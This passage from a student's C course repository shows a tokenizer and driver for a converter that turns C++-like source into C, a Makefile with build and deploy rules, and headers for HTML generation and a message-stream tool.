*/\n\t\t\tif(inString == 1 || in89Comment == 1)\n\t\t\t{\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = c;\n\t\t\t}\n\t\t\telse if(in99Comment == 1)\n\t\t\t{\n\t\t\t\tif(c == '\\n' || c == '\\r')\n\t\t\t\t{\n\t\t\t\t\tchar* newString;\n\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\ti = 0;\n\t\t\t\t\tin99Comment = 0;\n\n\t\t\t\t\tnewString = malloc(sizeof(char) * 3);\n\t\t\t\t\tnewString[0] = c;\n\t\t\t\t\tnewString[1] = '\\0';\n\n\t\t\t\t\tappendString(tokens, newString, strlen(newString));\n\t\t\t\t\tfree(newString);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t{\n\t\t\t\tchar* newString;\n\n\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\ti++;\n\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\tlastPrint = '\\0';\n\t\t\t\ti = 0;\n\n\t\t\t\tnewString = malloc(sizeof(char) * 3);\n\t\t\t\tnewString[0] = c;\n\t\t\t\tnewString[1] = '\\0';\n\n\t\t\t\tappendString(tokens, newString, strlen(newString));\n\t\t\t\tfree(newString);\n\t\t\t}\n\t\t}\n\t\telse if(strchr(\".,;(){}[]\", c) != NULL) /* this grabs punctuation */\n\t\t{\n\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t{\n\t\t\t\tif(i != 0)\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\ti = 0;\n\t\t\t\t}\n\n\t\t\t\t/* this saves the new token */\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\n\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\ti++;\n\n\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\tlastPrint = '\\0';\n\t\t\t\ti = 0;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tbuffer[i] = c;\n\t\t\t\tlastPrint = c;\n\t\t\t\ti++;\n\t\t\t}\n\t\t}\n\t\telse if(strchr(\"+-*/%=\", c) != NULL)\n\t\t{\n\t\t\tif(c == '/') /* possible comment, or division... 
*/\n\t\t\t{\n\t\t\t\t/* if our last print was a slash too, then we are in a comment right now */\n\t\t\t\tif(lastPrint == '/' && inString == 0)\n\t\t\t\t{\n\t\t\t\t\tin99Comment = 1;\n\t\t\t\t}\n\t\t\t\telse if(lastPrint == '*' && inString == 0)\n\t\t\t\t{\n\t\t\t\t\tin89Comment = 0;\n\t\t\t\t}\n\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = c;\n\t\t\t}\n\t\t\telse if(c == '+' || c == '-')\n\t\t\t{\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\t/* this means we are in a ++ or a -- situation */\n\t\t\t\t\tif(lastPrint == c)\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tlastPrint = c;\n\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tif(i != 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\t\ti++;\n\t\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\t\ti = 0;\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tlastPrint = c;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(c == '*') /* we have found an asterisk... might be a comment... 
*/\n\t\t\t{\n\t\t\t\tif(lastPrint == '/' && inString == 0)\n\t\t\t\t{\n\t\t\t\t\tin89Comment = 1;\n\t\t\t\t}\n\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\t/* this basically identifies the \"**\" in char** argv as one token */\n\t\t\t\t\tif(lastPrint != '*')\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t/* we need to print something */\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = c;\n\t\t\t}\n\t\t\telse if(c == '%') /* either a modulus or a printf formatter */\n\t\t\t{\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\tif(i != 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbuffer[i] = c;\n\t\t\t\ti++;\n\t\t\t\tlastPrint = '\\0';\n\t\t\t}\n\t\t\telse if(c == '=')\n\t\t\t{\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\t/* we are in a += kind of situation */\n\t\t\t\t\tif(strchr(\"+-*/%\", lastPrint) != NULL)\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tlastPrint = c;\n\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t\telse if(i != 0) /* if there is currently a non-operator in the buffer */\n\t\t\t\t\t{\n\t\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\t\ti++;\n\t\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\t\ti = 0;\n\t\t\t\t\t}\n\n\t\t\t\t\t/* outside of a string/comment, there is no time when this would be tacked\n\t\t\t\t\t onto anything. 
*/\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\ti = 0;\n\t\t\t\t}\n\t\t\t\telse /* this would run if we found a += in a comment or string */\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = c;\n\t\t\t\t\ti++;\n\t\t\t\t\tlastPrint = c;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse /* essentially, any non-special character. */\n\t\t{\n\t\t\tif(c == '\\\"')\n\t\t\t{\n\t\t\t\t/* if we are not in a string and NOT in a comment, we are now in a string */\n\t\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t/* this would be like a \\\" situation in a string */\n\t\t\t\t\tif(lastPrint != '\\\\')\n\t\t\t\t\t{\n\t\t\t\t\t\tinString = 0;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tif(inString == 0 && in89Comment == 0 && in99Comment == 0)\n\t\t\t{\n\t\t\t\t/* if our last print was an operator, we need to print it first */\n\t\t\t\tif(strchr(\"+-*/%\", lastPrint) != NULL)\n\t\t\t\t{\n\t\t\t\t\tbuffer[i] = '\\0';\n\t\t\t\t\ti++;\n\t\t\t\t\tappendString(tokens, buffer, i);\n\t\t\t\t\tlastPrint = '\\0';\n\t\t\t\t\ti = 0;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t/* add the default character */\n\t\t\tbuffer[i] = c;\n\t\t\ti++;\n\t\t\tlastPrint = c;\n\t\t}\n\n\t}while(c != EOF);\n\n\t/* free all the crap we were using */\n\tfree(buffer);\n\tfclose(fin);\n\n\treturn tokens;\n}\n\nint appendString(Vector* v, char* string, int i)\n{\n\tchar* nstr;\n\n\tif(v == NULL || v->contents == NULL || string == NULL)\n\t{\n\t\treturn -1;\n\t}\n\n\t/* this ensures real strings are being placed into the vector. 
*/\n\tif(string[0] != '\\0' && i > 0)\n\t{\n\t\tnstr = malloc(sizeof(char) * i + 1);\n\t\tstrcpy(nstr, string);\n\t\tappend(v, nstr);\n\t}\n\telse\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nvoid printProgram(Vector* tokens)\n{\n\tint i;\n\tint tabLevel;\n\n\ttabLevel = 0;\n\n\tif(tokens == NULL)\n\t{\n\t\treturn;\n\t}\n\n\t/* loop through the entirety of the tokens, essentially. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tint j;\n\n\t\t/* these are special characters for printing. They call for special newline rules */\n\t\tif(strstr(\"{};\", (char*) tokens->contents[i]) != NULL)\n\t\t{\n\t\t\tif(i + 1 < tokens->length && strcmp(tokens->contents[i+1], \";\") == 0)\n\t\t\t{\n\t\t\t\tprintf(\"%s\", (char*) tokens->contents[i]);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tprintf(\"%s\\n\", (char*) tokens->contents[i]);\n\t\t\t}\n\t\t\tif(strcmp((char*) tokens->contents[i], \"{\") == 0)\n\t\t\t{\n\t\t\t\ttabLevel ++;\n\t\t\t}\n\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t{\n\t\t\t\ttabLevel --;\n\t\t\t}\n\n\t\t\t/* this ensures proper printing levels for the next couple statements. */\n\t\t\tif(i + 1 < tokens->length && strcmp(tokens->contents[i+1], \"}\") == 0)\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel - 1; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(strstr(tokens->contents[i], \"//\") != NULL || strstr(tokens->contents[i], \"/*\") != NULL)\n\t\t{\n\t\t\tprintf(\"%s\\n\", (char*) tokens->contents[i]);\n\t\t\tif(i + 1 < tokens->length && strcmp(tokens->contents[i+1], \"}\") == 0)\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel - 1; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tfor(j = 0; j < tabLevel; j++)\n\t\t\t\t{\n\t\t\t\t\tprintf(\" \");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t/* this ensures that preprocessors are printed on seperate lines. 
*/\n\t\telse if(strstr((char*) tokens->contents[i], \"#include\") != NULL)\n\t\t{\n\t\t\tprintf(\"%s\\n\", (char*) tokens->contents[i]);\n\t\t}\n\n\t\telse\n\t\t{\n\t\t\tprintf(\"%s \", (char*)tokens->contents[i]);\n\t\t}\n\t}\n\treturn;\n}\n" }, { "alpha_fraction": 0.5926828980445862, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 14.769230842590332, "blob_id": "d2350e008a9d37cd522b2e470b59aba478d4b367", "content_id": "1a2941ce4e43542a79bc4ef33f90f3b188077e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 410, "license_type": "no_license", "max_line_length": 73, "num_lines": 26, "path": "/main.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the main method. This program is intended to\n *\tconvert cppL files to C files (see CFront for more info on the concept\n *\tof converting cpp to c)\n */\n#include\"driver.h\"\n#include<stdio.h>\n\nint main(int argc, char** argv)\n{\n\tif(argc < 2)\n\t{\n\t\tprintf(\"No file name given.\\n\");\n\t\treturn 0;\n\t}\n\t\n\trun(argv[1]);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6465898752212524, "alphanum_fraction": 0.6660761833190918, "avg_line_length": 14.68055534362793, "blob_id": "54036f0337d2c67798cc031558d974ed89d2b6f3", "content_id": "9b906c69c14ae3c71e6e7f05c445f7c042825b4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1129, "license_type": "no_license", "max_line_length": 70, "num_lines": 72, "path": "/driver.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the run() method, and a simple printing function\n *\tfor vectors.\n 
*/\n#include\"vector.h\"\n#include\"parseFile.h\"\n#include\"classToStruct.h\"\n#include\"recognize.h\"\n#include\"driver.h\"\n#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n\n\nvoid printVector(Vector* v, FILE* out)\n{\n\tint i;\n\n\tfor(i = 0; i < v->length; i++)\n\t{\n\t\tfprintf(out, \"%s\", (char*)v->contents[i]);\n\t}\n}\n\nint run(char* fname)\n{\n\tchar outfname[512];\n\n\tFILE* out;\n\tVector* tokens;\n\n\tstrcpy(outfname, fname);\n\toutfname[strlen(outfname) - 1] = '\\0';\n\n\tout = fopen(outfname, \"w\");\n\tif(out == NULL)\n\t{\n\t\tprintf(\"Error in opening output file %s\\n\", outfname);\n\t\treturn 1;\n\t}\n\n\ttokens = getTokens(fname);\n\tif(tokens == NULL)\n\t{\n\t\tprintf(\"File was invalid, could not read.\");\n\t\tfclose(out);\n\t\treturn 1;\n\t}\n\n\tmangleAllMembers(tokens);\n\taddSelfReferences(tokens);\n\tplaceConstructors(tokens);\n\n\tfixOuterFunctions(tokens);\n\tmigrateFunctions(tokens);\n\tcreateAllConstructors(tokens);\n\n\treplaceClass(tokens);\n\n\tprintVector(tokens, out);\n\tdestroyVector(tokens);\n\n\tfclose(out);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6691588759422302, "alphanum_fraction": 0.6897196173667908, "avg_line_length": 25.75, "blob_id": "c27bfffbd938a12eae941a35bf3437e1a97f117e", "content_id": "beaa87dd8dc1aef6c0198ccfb67fe7077f82683e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 3210, "license_type": "no_license", "max_line_length": 89, "num_lines": 120, "path": "/Makefile", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "CC\t\t=gcc\nCCON\t=./a1\nCFLAGS\t=-ansi -Wall -g\nTFLAGS\t=-Wall -pedantic -Wextra -Werror -ansi -g\nCOBJECTS=driver.o classToStruct.o parseFile.o recognize.o vector.o\nOBJECTS\t=stream.o post.o tags.o generation.o dbutils.o\nEXEC1 \t=post\nEXEC2\t=addauthor\nEXEC3\t=create\nEXEC4\t=db\nINCLUDE\t=./\nLINK\t=-lstream\nMYSQL\t=-lmysqlclient -L/usr/lib/x86_64-linux-gnu\nLPATH\t=./\n\n\n#\n# This 
specifies which rules take no parameters.\n#\n.PHONY: all clean clobber\n\nall: build\n\n#\n# This is the normal compilation rule. Simply typing 'make' will run this\n#\nbuild: cconverter post libstream.a addAuthor view.py create database\n\n#\n# Large-scale macros\n#\n\naddAuthor: libstream.a addAuthor.c\n\t$(CC) $(CFLAGS) -o $(EXEC2) addAuthor.c -I$(INCLUDE) -L$(LPATH) $(LINK) $(MYSQL)\n\nlibstream.a: stream.o\n\tar cr libstream.a stream.o #$(MYSQL)\n\ncconverter: $(COBJECTS)\n\t$(CC) $(CFLAGS) -o a1 main.c $(COBJECTS) -I$(INCLUDE)\n\npost: libstream.a post.o\n\t$(CC) $(CFLAGS) -o post post.o -L$(LPATH) $(LINK) $(MYSQL)\n\ncreate:\ttags.o generation.o\n\t$(CC) $(CFLAGS) -o create create.c tags.o generation.o -I$(INCLUDE)\n\nview.py:\n\tchmod +x ./view.py\n\ndatabase: dbutils.o\n\t$(CC) $(CFLAGS) -o db db.c dbutils.o -I$(INCLUDE) $(MYSQL)\n\n#\n# Object rules:\n#\n\ndriver.o: driver.c\n\t$(CC) $(CFLAGS) -o ./driver.o driver.c -c -I$(INCLUDE)\n\nclassToStruct.o: classToStruct.c\n\t$(CC) $(CFLAGS) -o ./classToStruct.o classToStruct.c -c -I$(INCLUDE)\n\nvector.o: vector.c\n\t$(CC) $(CFLAGS) -o ./vector.o vector.c -c -I$(INCLUDE)\n\nparseFile.o: parseFile.c\n\t$(CC) $(CFLAGS) -o ./parseFile.o parseFile.c -c -I$(INCLUDE)\n\nrecognize.o: recognize.c\n\t$(CC) $(CFLAGS) -o ./recognize.o recognize.c -c -I$(INCLUDE)\n\nstream.o: stream.c\n\t$(CC) $(CFLAGS) -c stream.c -I$(INCLUDE) $(MYSQL)\n\npost.o: precompile\n\t$(CC) $(CFLAGS) post.c -c -I$(INCLUDE) -L$(LPATH) $(LINK)\n\ntags.o: tags.c tags.h\n\t$(CC) $(CFLAGS) tags.c -c -I$(INCLUDE)\n\ngeneration.o: generation.c generation.h\n\t$(CC) $(CFLAGS) generation.c -c -I$(INCLUDE)\n\ndbutils.o: dbutils.c dbutils.h\n\t$(CC) $(CFLAGS) dbutils.c -c -I$(INCLUDE)\n\n#\n#\tc++ conversion rule\n#\nprecompile: $(COBJECTS) post.cc\n\t$(CCON) post.cc\n\n#\n# Clean-up rules. 
Removes the executable and objects.\n#\n\ndeploy:\n\tscp -r *.c [email protected]:/srv/www/gsoverni\n\tscp -r *.h [email protected]:/srv/www/gsoverni\n\tscp -r *.cc [email protected]:/srv/www/gsoverni\n\tscp -r *.py [email protected]:/srv/www/gsoverni\n\tscp -r *.css [email protected]:/srv/www/gsoverni\n\t#scp -r *.jpg [email protected]:/srv/www/gsoverni\n\tscp -r Makefile [email protected]:/srv/www/gsoverni\n\tscp -r *.wpml [email protected]:/srv/www/gsoverni\n\tscp -r *.html [email protected]:/srv/www/gsoverni\n\tscp -r readme.txt [email protected]:/srv/www/gsoverni\n\tscp -r *.php [email protected]:/srv/www/gsoverni\n\tscp -r *.txt [email protected]:/srv/www/gsoverni\n\tssh [email protected] \"cd /srv/www/gsoverni && mkdir -p ./bin && make\"\n\nclose:\n\tcp * /var/www/html/gsoverni\n\nclean:\n\trm $(EXEC1) $(EXEC2) $(EXEC3) $(EXEC$) $(CCON) \n\nclobber:\n\trm $(EXEC1) $(EXEC2) $(EXEC3) $(EXEC4) $(CCON) $(COBJECTS) $(OBJECTS) libstream.a post.c\n" }, { "alpha_fraction": 0.6326530575752258, "alphanum_fraction": 0.6494597792625427, "avg_line_length": 20.921052932739258, "blob_id": "cbedd77351abe97f5ccf46d183265de83e12638a", "content_id": "a14a990f1aeca24fa2f719daa60e97fcb80be18e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 833, "license_type": "no_license", "max_line_length": 70, "num_lines": 38, "path": "/driver.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the run() method, and a simple printing function\n *\tfor vectors.\n */\n#ifndef __GSOVERNIGO_DRIVER_H__\n#define __GSOVERNIGO_DRIVER_H__\n\n#include\"vector.h\"\n#include<stdio.h>\n\n/**\n *\tprintVector\n *\tprints a vector as a string vector, with no separation.\n *\tIN:\t\t\tv\t\t\t- the vector to be printed.\n *\t\t\t\tout\t\t\t- a file pointer to the required output.\n *\tOUT:\t\tvoid\n *\tPOST:\t\tv 
has been printed to stdout\n *\tERROR:\t\tv is null.\n */\nvoid printVector(Vector* v, FILE* out);\n\n/**\n *\trun\n *\truns the main program. calls the functions in order.\n *\tIN:\t\t\tfname\t\t- the file name we are going to read\n *\tOUT:\t\t0 on success.\n *\tPOST:\t\t<fname>.c has been created and written to.\n *\tERROR:\t\tfname points to an invalid file path.\n */\nint run(char* fname);\n\n#endif\n" }, { "alpha_fraction": 0.6660401225090027, "alphanum_fraction": 0.6741854548454285, "avg_line_length": 24.33333396911621, "blob_id": "dd6eda184da216411bc397bc4a22f8a58545831f", "content_id": "aa9e751a8f6ab4be201f9e1b07624502b1dee745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1596, "license_type": "no_license", "max_line_length": 69, "num_lines": 63, "path": "/generation.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains source for an html generator. 
\n */\n#ifndef __GSOVERNIGO_GENERATION_H__\n#define __GSOVERNIGO_GENERATION_H__\n\n/**\n *\tgeneratePage\n *\tgenerates a full page, given a file name\n *\tIN:\t\t\tfname\t\t\t- the file name we will be reading.\n *\tOUT:\t\tvoid\n *\tPOST:\t\ta whole php/html page will be printed to the page.\n *\tERROR:\t\tfname does not point to a valid file.\n */\nvoid generatePage(char* fname);\n\n/**\n *\tgenerateTag\n *\tgenerates a tag that is described by configtag.\n *\tIN:\t\t\tconfigTag\t\t- a wpml tag that needs to be turned into html\n *\tOUT:\t\tproduces an html tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tconfigtag is null.\n */\nchar* generateTag(char* configTag);\n\n/**\n *\tgetValue\n *\tgets a value from an attribute that is used to create an html tag.\n *\tIN:\t\t\tattribute\t\t- an attribute that is like: value=\"<value\"\n *\tOUT:\t\treturns a malloced version of the attribute's value.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc failes, attribute is null.\n */\nchar* getValue(char* attribute);\n\n/**\n *\tsplitTagLine\n *\tsplits a wpml tag line by the period delimiters.\n *\tIN:\t\t\ttagLine\t\t\t- the period separated tag line.\n *\tOUT:\t\ta string array that contains the tags for this line.\n *\tPOST:\t\tnone\n *\tERROR:\t\ttagline is null, malloc fails.\n */\nchar** splitTagLine(char* tagLine);\n\n/**\n *\tgetArgs\n *\tgets the args from an attribute tag.\n *\tIN:\t\t\twholetag\t\t- a whole tag, with attributes inside.\n *\tOUT:\t\tproduces a string array of all attributes.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc failes, and wholetag is null.\n */\nchar** getArgs(char* wholeTag);\n\n#endif\n" }, { "alpha_fraction": 0.5672215223312378, "alphanum_fraction": 0.6094750165939331, "avg_line_length": 13.199999809265137, "blob_id": "daa130a77258ba6c5840483eeee60fb46ca158ba", "content_id": "f896c3481301ea1ddf011e7dfc501b7e1f986759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 781, "license_type": "no_license", 
"max_line_length": 80, "num_lines": 55, "path": "/addAuthor.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains the main function for the addauthor program.\n *\tUtilizes stream.h to update stream files located in messages/\n */\n#include \"stream.h\"\n#include <string.h>\n#include <stdlib.h>\n#include <stdio.h>\n\nint main(int argc, char** argv)\n{\n\tint remove;\n\tchar list[1024];\n\tchar userName[512];\n\n\t/* checks the number of args present, makes sure we actually get a file name */\n\tif(argc < 3)\n\t{\n\t\treturn 1;\n\t}\n\n\tremove = 0;\n\n\tstrcpy(userName, argv[1]);\n\tif(strcmp(argv[2], \"-r\") == 0)\n\t{\n\t\treturn 1;\n\t}\n\tstrcpy(list, argv[2]);\n\n\tif(argc > 3)\n\t{\n\t\tif(strcmp(argv[3], \"-r\") == 0)\n\t\t{\n\t\t\tremove = 1;\n\t\t}\n\t}\n\n\tif(!remove)\n\t{\n\t\taddUser(userName, list);\n\t}\n\telse\n\t{\n\t\tremoveUser(userName, list);\n\t}\n\t\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6777983903884888, "alphanum_fraction": 0.6876932382583618, "avg_line_length": 30.705883026123047, "blob_id": "ee6a8c1f42d4b47ac0c36432532c95b92ec9287b", "content_id": "efa1b8582234414c470ab8f3232f7643556e5422", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1617, "license_type": "no_license", "max_line_length": 81, "num_lines": 51, "path": "/parseFile.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tThis file contains several methods for parsing a file into tokens\n * \tthat, if printed again in that order, will constitute a working cpp\n * \tprogram.\n */\n#ifndef __GSOVERNIGO_PARSEFILE_H__\n#define __GSOVERNIGO_PARSEFILE_H__\n\n#include\"vector.h\"\n\n/**\n * getTokens\n * gets the tokens (program independent terms) from the passed 
in cc file, and\n * organizes them into a vector struct.\n * IN:\t\t\tfname\t\t\t- the name of the file that will be tokenized.\n * OUT:\t\ttokens\t\t\t- the token vector that was derived from the file.\n * POST:\t\ta vector has been passed back, full of malloced strings.\n * ERROR:\t\tfname is an invalid file (null returned)\n */\nVector* getTokens(char* fname);\n\n/**\n * \tappendString\n *\ttakes string and the strlen of that string, and mallocs a new string, also\n *\tappending it to the end of vector v.\n *\tIN:\t\t\tv\t\t\t\t- the vector to be appended to.\n *\t\t\t\tstring\t\t\t- the string that will be malloced and appeneded\n *\t\t\t\ti\t\t\t\t- the strlen of the string that was passed in.\n *\tOUT:\t\t-1 on error, 0 on success, 1 on non-populated string\n *\tPOST:\t\tstring has been copied into v.\n *\tERROR:\t\tif malloc fails, or any passed in arguments are null/invalid\n */\nint appendString(Vector* v, char* string, int i);\n\n/**\n *\tprintProgram\n *\tprints the program out, in a formatted way. 
(traditional brackets and tabbing)\n *\tIN:\t\t\ttokens\t\t\t- a vector of the tokens that are to be printed.\n *\tOUT:\t\tvoid; no output produced.\n *\tPOST:\t\ttokens has been printed to the screen/file\n *\tERROR:\t\ttokens in null.\n */\nvoid printProgram(Vector* tokens);\n\n#endif\n" }, { "alpha_fraction": 0.6487570405006409, "alphanum_fraction": 0.6487570405006409, "avg_line_length": 23.129032135009766, "blob_id": "8b267da344e3527ce7850cf3fe090bd98ec2eb77", "content_id": "4765656fdbbe81148b3ccb9677c0fdcb10509d6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3741, "license_type": "no_license", "max_line_length": 82, "num_lines": 155, "path": "/tags.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#ifndef __GSOVERNIGO_TAGS_H__\n#define __GSOVERNIGO_TAGS_H__\n\n#define START_TAGS \"<html><body>\"\n#define END_TAGS \"</body></html>\"\n#define LINE_BREAK \"<br>\"\n\n/**\n *\tcreateText\n *\tcreates a text html tag from the passed in wpml tag.\n *\tIN:\t\t\ttextTag\t\t\t- the text tag that we will be reading\n *\tOUT:\t\ta new html-stable text tag (no <p> tags surrounding)\n *\tPOST:\t\tnone\n *\tERROR:\t\ttextTag is NULL.\n */\nchar* createText(char* textTag);\n\n/**\n *\tcreateHeader\n *\tcreates a header tag from the passed in wpml tag.\n *\tIN:\t\t\theadTag\t\t\t- the wpml header tag\n *\tOUT:\t\ta new html header tag <hn> formatted.\n *\tPOST:\t\tnone\n *\tERROR:\t\theadTag is NULL.\n */\nchar* createHeader(char* headTag);\n\n/**\n *\tcreateLink\n *\tcreates an <a href> tag from a wpml tag.\n *\tIN:\t\t\ta .l wpml tag.\n *\tOUT:\t\tan <a href> html tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tlinktag is NULL\n */\nchar* createLink(char* linkTag);\n\n/**\n *\tcreateButton\n *\tcreates a button tag-and-form in html\n *\tIN:\t\t\tbuttonTag \t\t- the button wpml tag.\n *\tOUT:\t\tan html button and form tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tbuttontag is null.\n */\nchar* 
